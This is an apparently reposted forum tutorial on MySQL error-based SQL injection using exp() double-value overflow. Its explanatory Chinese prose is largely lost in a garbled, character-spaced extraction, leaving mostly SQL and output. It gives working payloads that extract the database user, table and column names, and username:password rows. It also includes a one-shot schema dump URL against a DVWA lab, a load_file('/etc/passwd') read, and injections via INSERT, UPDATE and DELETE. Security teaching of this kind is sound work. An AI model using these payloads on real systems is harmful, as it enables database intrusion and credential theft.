[20827] 2017-07-23_使用exp进行SQL报错注入

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2017-07-23_使用exp进行SQL报错注入 使 e x p S Q L L e m o n S e c   2 0 1 7 - 0 7 - 2 3 7 0 9 m y s q l >   s e l e c t   e x p ( 7 0 9 ) ; + - - - - - - - - - - - - - - - - - - - - - - - + |   e x p ( 7 0 9 )                             | + - - - - - - - - - - - - - - - - - - - - - - - + |   8 . 2 1 8 4 0 7 4 6 1 5 5 4 9 7 2 e 3 0 7   | + - - - - - - - - - - - - - - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c )   m y s q l >   s e l e c t   e x p ( 7 1 0 ) ; E R R O R   1 6 9 0   ( 2 2 0 0 3 ) :   D O U B L E   v a l u e   i s   o u t   o f   r a n g e   i n   ' e x p ( 7 1 0 ) ' e m y s q l >   s e l e c t   l o g ( 1 5 ) ; + - - - - - - - - - - - - - - - - - - + |   l o g ( 1 5 )                     | + - - - - - - - - - - - - - - - - - - + |   2 . 7 0 8 0 5 0 2 0 1 1 0 2 2 1   | + - - - - - - - - - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c )   m y s q l >   s e l e c t   l n ( 1 5 ) ; + - - - - - - - - - - - - - - - - - - + |   l n ( 1 5 )                       | + - - - - - - - - - - - - - - - - - - + |   2 . 7 0 8 0 5 0 2 0 1 1 0 2 2 1   | + - - - - - - - - - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c ) e m y s q l >   s e l e c t   e x p ( 2 . 7 0 8 0 5 0 2 0 1 1 0 2 2 1 ) ; + - - - - - - - - - - - - - - - - - - - - - - - + |   e x p ( 2 . 7 0 8 0 5 0 2 0 1 1 0 2 2 1 )   | + - - - - - - - - - - - - - - - - - - - - - - - + |                                         1 5   | + - - - - - - - - - - - - - - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c ) e x p ( ) M y S Q L e x p l n l o g l o g l n e x p ( )
0 x 0 2   使 0 0 m y s q l >   s e l e c t   ~ 0 ; + - - - - - - - - - - - - - - - - - - - - - - + |   ~ 0                                       | + - - - - - - - - - - - - - - - - - - - - - - + |   1 8 4 4 6 7 4 4 0 7 3 7 0 9 5 5 1 6 1 5   | + - - - - - - - - - - - - - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c )   m y s q l >   s e l e c t   ~ ( s e l e c t   v e r s i o n ( ) ) ; + - - - - - - - - - - - - - - - - - - - - - - + |   ~ ( s e l e c t   v e r s i o n ( ) )     | + - - - - - - - - - - - - - - - - - - - - - - + |   1 8 4 4 6 7 4 4 0 7 3 7 0 9 5 5 1 6 1 0   | + - - - - - - - - - - - - - - - - - - - - - - + 1   r o w   i n   s e t ,   1   w a r n i n g   ( 0 . 0 0   s e c ) > ` e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   u s e r ( ) ) x ) ) `         m y s q l >   s e l e c t   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   u s e r ( ) ) x ) ) ;         E R R O R   1 6 9 0   ( 2 2 0 0 3 ) :   D O U B L E   v a l u e   i s   o u t   o f   r a n g e   i n   ' e x p ( ~ ( ( s e l e c t   ' r o o t @ l o c a l h o s t '   f r o m   d u a l ) ) ) ' 0 x 0 3   s e l e c t   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )   l i m i t   0 , 1 ) x ) ) ; s e l e c t   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   c o l u m n _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' u s e r s '   l i m i t   0 , 1 ) x ) ) ; s e l e c t   e x p ( ~   ( s e l e c t * f r o m ( s e l e c t   c o n c a t _ w s ( ' : ' , i d ,   u s e r n a m e ,   p a s s w o r d )   f r o m   u s e r s   l i m i t   0 , 1 ) x ) ) ; 0 x 0 4   d u m p t a b l e s c o l u m n s d u m p e x p ( ~ ( s e l e c t * f r o m ( s e l e c t ( c o n c a t ( @ : = 0 , ( s e l e c t   c o u n t ( * ) f r o m ` i n f o r m a t i o n _ s c h e m a ` . c o l u m n s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( ) a n d @ : = c o n c a t ( @ , 0 x a , t a b l e _ s c h e m a , 0 x 3 a 3 a , t a b l e _ n a m e , 0 x 3 a 3 a , c o l u m n _ n a m e ) ) , @ ) ) ) x ) ) h t t p : / / l o c a l h o s t / d v w a / v u l n e r a b i l i t i e s / s q l i / ? i d = 1 '   o r   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t ( c o n c a t ( @ : = 0 , ( s e l e c t   c o u n t ( * ) f r o m ` i n f o r m a t i o n _ s c h e m a ` . c o l u m n s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( ) a n d @ : = c o n c a t ( @ , 0 x a , t a b l e _ s c h e m a , 0 x 3 a 3 a , t a b l e _ n a m e , 0 x 3 a 3 a , c o l u m n _ n a m e ) ) , @ ) ) ) x ) ) - -   - & S u b m i t = S u b m i t # 0 x 0 4   D O U B L E   v a l u e   i s   o u t   o f   r a n g e 1 8 4 4 6 7 4 4 0 7 3 7 0 9 5 5 1 6 1 5 B I G I N T D O U B L E   o v e r f l o w   e r r o r l o a d _ f i l e ( )
1 3 使 s e l e c t   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   l o a d _ f i l e ( ' / e t c / p a s s w d ' ) ) a ) ) ; 0 m y s q l >   s e l e c t   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   ' h e l l o ' ) a ) )   i n t o   o u t f i l e   ' C : / o u t . t x t ' ; E R R O R   1 6 9 0   ( 2 2 0 0 3 ) :   D O U B L E   v a l u e   i s   o u t   o f   r a n g e   i n   ' e x p ( ~ ( ( s e l e c t   ' h e l l o '   f r o m   d u a l ) ) ) '         #   t y p e   C : o u t . t x t 0 0 x 0 5   I n j e c t i o n   i n   I n s e r t m y s q l >   i n s e r t   i n t o   u s e r s   ( i d ,   u s e r n a m e ,   p a s s w o r d )   v a l u e s   ( 2 ,   ' '   ^   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   u s e r ( ) ) x ) ) ,   ' E y r e ' ) ; E R R O R   1 6 9 0   ( 2 2 0 0 3 ) :   D O U B L E   v a l u e   i s   o u t   o f   r a n g e   i n   ' e x p ( ~ ( ( s e l e c t   ' r o o t @ l o c a l h o s t '   f r o m   d u a l ) ) ) ' 使 m y s q l >   i n s e r t   i n t o   u s e r s   ( i d ,   u s e r n a m e ,   p a s s w o r d )   v a l u e s   ( 2 ,   ' '   |   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t ( c o n c a t ( @ : = 0 , ( s e l e c t   c o u n t ( * ) f r o m ` i n f o r m a t i o n _ s c h e m a ` . c o l u m n s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( ) a n d @ : = c o n c a t ( @ , 0 x a , t a b l e _ s c h e m a , 0 x 3 a 3 a , t a b l e _ n a m e , 0 x 3 a 3 a , c o l u m n _ n a m e ) ) , @ ) ) ) x ) ) ,   ' E y r e ' ) ; E R R O R   1 6 9 0   ( 2 2 0 0 3 ) :   D O U B L E   v a l u e   i s   o u t   o f   r a n g e   i n   ' e x p ( ~ ( ( s e l e c t   ' 0 0 0 n e w d b : : u s e r s : : i d n e w d b : : u s e r s : : u s e r n a m e n e w d b : : u s e r s : : p a s s w o r d '   f r o m   d u a l ) ) ) ' 0 x 0 6   I n j e c t i o n   i n   U p d a t e m y s q l >   u p d a t e   u s e r s   s e t   p a s s w o r d = ' P e t e r '   ^   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   u s e r ( ) ) x ) )   w h e r e   i d = 4 ; E R R O R   1 6 9 0   ( 2 2 0 0 3 ) :   D O U B L E   v a l u e   i s   o u t   o f   r a n g e   i n   ' e x p ( ~ ( ( s e l e c t   ' r o o t @ l o c a l h o s t '   f r o m   d u a l ) ) ) ' 0 x 0 7   I n j e c t i o n   i n   D e l e t e m y s q l >   d e l e t e   f r o m   u s e r s   w h e r e   i d = ' 1 '   |   e x p ( ~ ( s e l e c t * f r o m ( s e l e c t   u s e r ( ) ) x ) ) ; E R R O R   1 6 9 0   ( 2 2 0 0 3 ) :   D O U B L E   v a l u e   i s   o u t   o f   r a n g e   i n   ' e x p ( ~ ( ( s e l e c t   ' r o o t @ l o c a l h o s t '   f r o m   d u a l ) ) ) ' 0 x 0 8   B I G I N T e x p M y S Q L 5 . 5 . 5 m y s q l >   s e l e c t   v e r s i o n ( ) ; + - - - - - - - - - - - - - - - - - - - - - + |   v e r s i o n ( )                       | + - - - - - - - - - - - - - - - - - - - - - + |   5 . 0 . 4 5 - c o m m u n i t y - n t   | + - - - - - - - - - - - - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c )   m y s q l >   s e l e c t   e x p ( 7 1 0 ) ; + - - - - - - - - - - + |   e x p ( 7 1 0 )   | + - - - - - - - - - - + l o a d _ f i l e ( ) B I G I N T   o v e r f l o w   i n j e c t i o n s i n s e r t u p d a t e d e l e t e D I O S
|       1 . # I N F   | + - - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c )   m y s q l >   s e l e c t   e x p ( ~ 0 ) ; + - - - - - - - - - + |   e x p ( ~ 0 )   | + - - - - - - - - - + |     1 . # I N F   | + - - - - - - - - - + 1   r o w   i n   s e t   ( 0 . 0 0   s e c )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则